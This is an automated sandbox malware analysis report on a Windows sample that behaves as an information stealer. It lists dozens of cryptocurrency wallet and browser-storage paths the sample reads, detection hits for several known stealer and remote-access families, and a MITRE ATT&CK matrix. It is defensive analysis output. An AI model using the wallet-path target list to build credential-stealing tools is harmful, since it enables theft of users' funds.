Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Source: Yara match	File source: 34.2.regsvr32.exe.1c580000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.1c580000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2146220338.000000000175D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2134855142.0000000001705000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2122311529.0000000001764000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2104690253.0000000001755000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2122359158.0000000001705000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4522281030.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2105985714.0000000001758000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2122416229.000000000171D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2134956799.000000000171D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DbCMTMgeJo.exe PID: 3812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Avoiding.com PID: 2696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6404, type: MEMORYSTR

Remote Access Functionality

Yara detected BrowserPasswordDump

Source: Yara match	File source: 34.2.regsvr32.exe.1c580000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.1c580000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6404, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: DbCMTMgeJo.exe PID: 3812, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 8.2.c153ad0ce0.exe.4179550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.c153ad0ce0.exe.4179550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.c153ad0ce0.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.2747691872.0000000000D52000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2984332143.0000000004179000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000003.00000003.2238846734.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2285594803.0000000000D21000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2287809915.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe PID: 6056, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected StormKitty Stealer

Source: Yara match	File source: 34.2.regsvr32.exe.1c580000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.1c580000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4522281030.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6404, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected XWorm

Source: Yara match	File source: 34.2.regsvr32.exe.64ca5e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.2310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.211131e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.2310000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.211131e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.64ca5e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4516843364.000000000062B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4522281030.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6404, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FDEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,		7_2_00FDEC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FDDF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,		7_2_00FDDF51

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	111 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	1 Windows Service	1 Windows Service	111 Deobfuscate/Decode Files or Information	1 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	11 Scheduled Task/Job	512 Process Injection	131 Obfuscated Files or Information	Security Account Manager	12 File and Directory Discovery	SMB/Windows Admin Shares	1 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	Login Hook	11 Scheduled Task/Job	32 Software Packing	NTDS	256 System Information Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1171 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Masquerading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	471 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	471 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	512 Process Injection	Network Sniffing	3 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DbCMTMgeJo.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Xworm

Threatname: Vidar

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
DbCMTMgeJo.exe